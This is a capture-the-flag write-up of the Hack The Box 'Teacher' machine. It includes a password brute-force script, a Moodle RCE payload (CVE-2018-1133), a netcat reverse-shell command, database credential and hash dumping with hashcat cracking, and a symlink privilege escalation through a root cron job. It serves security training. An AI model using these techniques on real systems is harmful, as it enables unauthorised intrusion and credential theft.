I"›f<h1 id="htb-teacher-101010153-machine-write-up">HTB Teacher (10.10.10.153) MACHINE WRITE-UP</h1>

<h3 id="table-of-contents">TABLE OF CONTENTS</h3>

<hr />

<h2 id="part-1--initial-recon">PART 1 : INITIAL RECON</h2>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">--min-rate</span> 1000 <span class="nt">-p-</span> <span class="nt">-v</span> 10.10.10.153
<span class="go">
  PORT   STATE SERVICE
  80/tcp open  http

</span><span class="gp">$</span><span class="w"> </span>nmap <span class="nt">-oN</span> teacher.nmap <span class="nt">-p</span> 80 <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-v</span> 10.10.10.153
<span class="go">
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.25 ((Debian))
  | http-methods:
  |_  Supported Methods: OPTIONS HEAD GET POST
  |_http-server-header: Apache/2.4.25 (Debian)
  |_http-title: Blackhat highschool

</span></code></pre></div></div>
<hr />

<h2 id="part-2--port-enumeration">PART 2 : PORT ENUMERATION</h2>

<ul>
  <li>Visit http://10.10.10.153/
    <ul>
      <li>
        <p>Landing Page:</p>

        <p><img src="./screenshots/80_teacher_home.png" alt="Landing Page" /></p>
      </li>
      <li>
        <p>Check <strong>GALLERY</strong> <a href="http://10.10.10.153/gallery.html#">(<strong><em>/gallery.html</em></strong>)</a></p>

        <p><img src="./screenshots/80_teacher_gallery.png" alt="Gallery Page" /></p>

        <p><strong>Note</strong>:</p>
        <ul>
          <li>One of the images failed to load
            <div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"#"</span><span class="nt">&gt;&lt;img</span> <span class="na">src=</span><span class="s">"images/5.png"</span> <span class="na">onerror=</span><span class="s">"console.log('That\'s an F');"</span> <span class="na">alt=</span><span class="s">""</span><span class="nt">&gt;&lt;/a&gt;</span>
</code></pre></div>            </div>
          </li>
        </ul>
      </li>
      <li>
        <p>Open the image using <code class="highlighter-rouge">curl</code></p>
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">curl http://10.10.10.153/images/5.png
</span></code></pre></div>        </div>
        <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni
</code></pre></div>        </div>
        <p><strong>Notes</strong></p>
        <ul>
          <li>An incomplete password was given for <strong>Giovanni</strong></li>
          <li>Where to use the credentials is stil unknown</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>
    <p>Run <code class="highlighter-rouge">gobuster</code> on http://10.10.10.153/</p>

    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gobuster -u http://10.10.10.153 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

</span><span class="gp">#</span><span class="w"> </span>/images <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/css <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/manual <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/js <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/javascript <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/fonts <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/phpmyadmin <span class="o">(</span>Status: 403<span class="o">)</span>
<span class="gp">#</span><span class="w"> </span>/moodle <span class="o">(</span>Status: 301<span class="o">)</span>
</code></pre></div>    </div>
  </li>
  <li>Visit http://10.10.10.153/moodle/
    <ul>
      <li>
        <p>Landing Page:</p>

        <p><img src="./screenshots/80_teacher_moodle.png" alt="Moodle Home" /></p>
      </li>
      <li>
        <p>Login Page:</p>

        <p><img src="./screenshots/80_teacher_moodle_login.png" alt="Moodle Login" /></p>
      </li>
    </ul>
  </li>
</ul>

<hr />

<h2 id="part-3--generate-user-shell">PART 3 : Generate User Shell</h2>

<ol>
  <li>Complete Giovanni‚Äôs incomplete password:
    <ul>
      <li><strong><em>moodle_login.py</em></strong>
        <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">requests</span> <span class="k">as</span> <span class="n">r</span>

<span class="n">characters</span> <span class="o">=</span> <span class="s">"abcdefghijklmnopqrstuvwxyz1234567890!@#$</span><span class="si">%</span><span class="s">^&amp;*()"</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">characters</span><span class="p">:</span>
    
    <span class="n">creds</span> <span class="o">=</span> <span class="p">{</span>
        <span class="s">"username"</span><span class="p">:</span> <span class="s">"Giovanni"</span><span class="p">,</span>
        <span class="s">"password"</span><span class="p">:</span> <span class="s">"Th4C00lTheacha"</span> <span class="o">+</span> <span class="n">i</span>
    <span class="p">}</span>
    
    <span class="n">req</span> <span class="o">=</span> <span class="n">r</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="s">"http://10.10.10.153/moodle/login/index.php"</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">creds</span><span class="p">)</span>

    <span class="n">err_message</span> <span class="o">=</span> <span class="s">"Invalid login"</span>
    <span class="k">if</span> <span class="n">err_message</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">req</span><span class="o">.</span><span class="n">text</span><span class="p">:</span> 
        
        <span class="k">print</span><span class="p">(</span><span class="s">"PASSWORD: "</span> <span class="o">+</span> <span class="n">creds</span><span class="p">[</span><span class="s">"password"</span><span class="p">])</span>
        <span class="k">break</span>
</code></pre></div>        </div>
      </li>
      <li>Run the python script
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">python3 moodle_login.py
</span></code></pre></div>        </div>
      </li>
      <li>Output:
        <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PASSWORD: Th4C00lTheacha# 
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
  <li>Login using <strong>giovanni</strong>:<strong>Th4C00lTheacha#</strong>
    <ol>
      <li>Set-up moodle exploit ‚Äì <strong>Evil Teacher</strong> (<a href="https://blog.ripstech.com/2018/moodle-remote-code-execution/]">CVE-2018-1133</a>)
        <ol>
          <li>Select a quiz</li>
          <li>Click <strong>Edit quiz</strong></li>
          <li>Add a new question
            <ol>
              <li>Select <strong>Calculated</strong> then <strong>Add</strong></li>
              <li>Fill up the required fields:
                <ul>
                  <li>Question name: &lt;ANYTHING GOES HERE&gt;</li>
                  <li>Question text: &lt;ANYTHING GOES HERE&gt;</li>
                  <li>Answer 1 Formula: <code class="highlighter-rouge">/*{a*/</code>$_GET[cmd]<code class="highlighter-rouge">;//{x}}</code></li>
                  <li>Grade: 100%</li>
                </ul>
              </li>
            </ol>
          </li>
          <li>Click <strong>Save changes</strong></li>
          <li>Click <strong>Next page</strong></li>
        </ol>
      </li>
      <li>Set-up local netcal listener
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">nc -lvp 4444
</span></code></pre></div>        </div>
      </li>
      <li>Append <code class="highlighter-rouge">&amp;cmd=(date; nc &lt;HTB IPv4&gt; 4444 -e /bin/bash)</code> to URL</li>
      <li>Submit the URL</li>
    </ol>
  </li>
  <li>While inside the shell:
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">id
</span><span class="gp">#</span><span class="w"> </span>&amp;cmd<span class="o">=(</span><span class="nb">date</span><span class="p">;</span> nc &lt;HTB IPv4&gt; 4444 <span class="nt">-e</span> /bin/bash<span class="o">)</span>
<span class="go">
</span><span class="gp">python -c 'import pty;</span><span class="w"> </span>pty.spawn<span class="o">(</span><span class="s2">"/bin/bash"</span><span class="o">)</span><span class="s1">'
</span><span class="go"> 
cat /etc/passwd | grep bash
</span><span class="gp">#</span><span class="w"> </span>root:x:0:0:root:/root:/bin/bash
<span class="gp">#</span><span class="w"> </span>giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash
<span class="go">
</span><span class="gp">find /var/www -name *conf* 2&gt;</span><span class="w"> </span>/dev/null
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>/var/www/html/moodle/config.php
<span class="gp">#</span><span class="w"> </span>...
<span class="go">
cat /var/www/html/moodle/config.php
</span></code></pre></div>    </div>
    <ul>
      <li><strong><em>/var/www/html/moodle/config.php</em></strong> contents
        <pre><code class="language-PHP">&lt;?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG-&gt;dbtype    = 'mariadb';
$CFG-&gt;dblibrary = 'native';
$CFG-&gt;dbhost    = 'localhost';
$CFG-&gt;dbname    = 'moodle';
$CFG-&gt;dbuser    = 'root';
$CFG-&gt;dbpass    = 'Welkom1!';
$CFG-&gt;prefix    = 'mdl_';
$CFG-&gt;dboptions = array (
  'dbpersist' =&gt; 0,
  'dbport' =&gt; 3306,
  'dbsocket' =&gt; '',
  'dbcollation' =&gt; 'utf8mb4_unicode_ci',
);

$CFG-&gt;wwwroot   = 'http://10.10.10.153/moodle';
$CFG-&gt;dataroot  = '/var/www/moodledata';
$CFG-&gt;admin     = 'admin';

$CFG-&gt;directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
</code></pre>
      </li>
      <li>Enter <strong>MariaDB CLI</strong>
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">mariadb -uroot -pWelkom1!

</span><span class="gp">#</span><span class="w"> </span>MariaDB <span class="o">[(</span>none<span class="o">)]&gt;</span> SHOW databases<span class="p">;</span>
<span class="go">
</span><span class="gp">#</span><span class="w"> </span>+--------------------+
<span class="gp">#</span><span class="w"> </span>| Database           |
<span class="gp">#</span><span class="w"> </span>+--------------------+
<span class="gp">#</span><span class="w"> </span>| ...                |
<span class="gp">#</span><span class="w"> </span>| moodle             |
<span class="gp">#</span><span class="w"> </span>| ...                |
<span class="gp">#</span><span class="w"> </span>+--------------------+
<span class="go">
</span><span class="gp">#</span><span class="w"> </span>MariaDB <span class="o">[(</span>none<span class="o">)]&gt;</span> USE moodle
<span class="go">
</span><span class="gp">#</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; SHOW tables<span class="p">;</span>
<span class="go">    
</span><span class="gp">#</span><span class="w"> </span>+----------------------------------+
<span class="gp">#</span><span class="w"> </span>| Tables_in_moodle                 |
<span class="gp">#</span><span class="w"> </span>+----------------------------------+
<span class="gp">#</span><span class="w"> </span>| ...                              |
<span class="gp">#</span><span class="w"> </span>| mdl_user                         |
<span class="gp">#</span><span class="w"> </span>| ...                              |
<span class="gp">#</span><span class="w"> </span>+----------------------------------+
<span class="go">
</span><span class="gp">#</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; SELECT <span class="k">*</span> FROM mdl_user<span class="p">;</span>
<span class="go">   
</span><span class="gp">#</span><span class="w"> </span>+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
<span class="gp">#</span><span class="w"> </span>| <span class="nb">id</span>   | auth   | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password                                                     | idnumber | firstname  | lastname | email          | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip        | secret | picture | url | description                                                               | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
<span class="gp">#</span><span class="w"> </span>+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
<span class="gp">#</span><span class="w"> </span>|    1 | manual |         1 |            0 |       0 |         0 |          1 | guest       | <span class="nv">$2y$10$ywuE5gDlAlaCu9R0w7pKW</span>.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user |          | root@localhost |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |  |       0 |     | This user is a special user that allows read-only access to some courses. | 1 |          1 |          0 |           2 |             1 |           0 |           0 |   1530058999 |    0 | NULL     | NULL             | NULL              | NULL       | NULL          |
<span class="gp">#</span><span class="w"> </span>|    2 | manual |         1 |            0 |       0 |         0 |          1 | admin       | <span class="nv">$2y$10$7VPsdU9</span>/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin      | User     | gio@gio.nl     |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059097 | 1530059573 | 1530059097 |   1530059307 | 192.168.206.1 |  |       0 |     |                                                                           | 1 |          1 |          0 |           1 |             1 |           0 |           0 |   1530059135 |    0 | NULL     |                  |                   |            |               |
<span class="gp">#</span><span class="w"> </span>|    3 | manual |         1 |            0 |       0 |         0 |          1 | giovanni    | <span class="nv">$2y$10$38V6kI7LNudORa7lBAT0q</span>.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni   | Chhatta  | Giio@gio.nl    |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059681 | 1555841309 | 1555840529 |   1555840557 | 10.10.15.36   |  |       0 |     |                                                                           | 1 |          1 |          0 |           2 |             1 |           0 |  1530059291 |   1530059291 |    0 |          |                  |                   |            |               |
<span class="gp">#</span><span class="w"> </span>| 1337 | manual |         0 |            0 |       0 |         0 |          0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |          |            |          |                |         0 |   |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |  |       0 |     | NULL                                                                      | 1 |          1 |          0 |           2 |             1 |           0 |           0 |            0 |    0 | NULL     | NULL             | NULL              | NULL       | NULL          |
<span class="gp">#</span><span class="w"> </span>+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
<span class="go">
</span><span class="gp">#</span><span class="w"> </span>MariaDB <span class="o">[</span>moodle]&gt; <span class="se">\q</span>
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
        <ul>
          <li>The user <strong>Giovannibak</strong> has a different password hash than the rest</li>
          <li><strong>Giovannibak</strong>‚Äôs password is in <strong>MD5</strong></li>
        </ul>
      </li>
      <li>Decrypt <strong>Giovannibak</strong>‚Äôs password:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">hashcat --force -m0 7a860966115182402ed06375cf0a22af /usr/share/wordlists/rockyou.txt
</span><span class="gp">#</span><span class="w"> </span>7a860966115182402ed06375cf0a22af:expelled
</code></pre></div>        </div>
      </li>
      <li>Go back to <strong>www-data</strong> shell
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">su giovanni
</span><span class="gp">#</span><span class="w"> </span>Password: expelled
<span class="go">
id
</span><span class="gp">#</span><span class="w"> </span><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>1000<span class="o">(</span>giovanni<span class="o">)</span>
<span class="go">     
cat ~/user.txt
</span><span class="gp">#</span><span class="w"> </span>fa9ae187462530e841d9e61936648fa7
</code></pre></div>        </div>
      </li>
    </ul>
  </li>
</ol>

<hr />

<h2 id="step-4--privilege-escalation-giovanni---root">STEP 4 : Privilege Escalation <strong>(giovanni -&gt; root)</strong></h2>

<ol>
  <li>Download and upload <a href="https://github.com/DominicBreuker/pspy">pspy</a>
    <ol>
      <li>Check system architecture of FriendZone
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">uname -mnop
</span><span class="gp">#</span><span class="w"> </span>teacher x86_64 unknown GNU/Linux
</code></pre></div>        </div>
        <p><strong>Note</strong>:</p>
        <ul>
          <li>The system runs on 64-bit</li>
        </ul>
      </li>
      <li>Upload <a href="https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy64">pspy64</a> to Teacher
        <ul>
          <li>Local terminal:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">python -m SimpleHTTPServer
</span><span class="gp">#</span><span class="w"> </span>Serving HTTP on 0.0.0.0 port 8000 ...
</code></pre></div>            </div>
          </li>
          <li>Teacher shell:
            <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">wget -O /tmp/pspy64 http://&lt;HTB IPv4&gt;</span>:8000/pspy64
<span class="gp">#</span><span class="w"> </span>‚Äò/tmp/pspy64‚Äô saved <span class="o">[</span>4468984/4468984]
<span class="go">        
chmod +x /tmp/pspy64
</span></code></pre></div>            </div>
          </li>
        </ul>
      </li>
    </ol>
  </li>
  <li>Run <strong>pspy64</strong>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">./pspy64
</span><span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>04:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1342   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>05:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1354   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
<span class="gp">#</span><span class="w"> </span>06:01 CMD: <span class="nv">UID</span><span class="o">=</span>0    <span class="nv">PID</span><span class="o">=</span>1375   | /bin/bash /usr/bin/backup.sh
<span class="gp">#</span><span class="w"> </span>...
</code></pre></div>    </div>
    <p><strong>Notes</strong>:</p>
    <ul>
      <li>There is a script called <strong><em>backup.sh</em></strong></li>
      <li>It runs every minute</li>
    </ul>
  </li>
  <li>Examine <strong><em>/usr/bin/backup.sh</em></strong>
    <ul>
      <li><strong><em>backup.sh</em></strong> contents:
        <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="nb">cd</span> /home/giovanni/work<span class="p">;</span>
<span class="nb">tar</span> <span class="nt">-czvf</span> tmp/backup_courses.tar.gz courses/<span class="k">*</span><span class="p">;</span>
<span class="nb">cd </span>tmp<span class="p">;</span>
<span class="nb">tar</span> <span class="nt">-xf</span> backup_courses.tar.gz<span class="p">;</span>
<span class="nb">chmod </span>777 <span class="k">*</span> <span class="nt">-R</span><span class="p">;</span>
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li>The script is being ran by <strong>root</strong> periodically</li>
      <li>Contents of the <code class="highlighter-rouge">courses/</code> directory are compressed
        <ul>
          <li>The compressed file is saved in <code class="highlighter-rouge">~/work/tmp</code></li>
        </ul>
      </li>
      <li>The compressed file is decompressed on where it is saved</li>
      <li>The first <strong>tar</strong> and <strong>chmod</strong> use wildcards (‚Äú<strong>*</strong>‚Äù)</li>
      <li>Everything inside <code class="highlighter-rouge">~/work/tmp</code> will have its permissions changed</li>
    </ul>
  </li>
  <li>Exploit <strong><em>/usr/bin/backup.sh</em></strong>
    <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cd /home/giovanni/work

rm -rf tmp

ln -s / ./tmp
</span></code></pre></div>    </div>
    <ul>
      <li>after <strong><em>backup.sh</em></strong> runs:
        <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">cat /root/root.txt
</span><span class="gp">#</span><span class="w"> </span>4f3a83b42ac7723a508b8ace7b8b1209
</code></pre></div>        </div>
        <p><strong>Notes</strong>:</p>
      </li>
      <li><code class="highlighter-rouge">~/work/tmp</code> was changed to have a symbolic link to <code class="highlighter-rouge">/</code></li>
      <li>Now, everything inside <code class="highlighter-rouge">/</code> has <code class="highlighter-rouge">-rwxrwxrwx</code>permissions</li>
    </ul>
  </li>
</ol>
:ET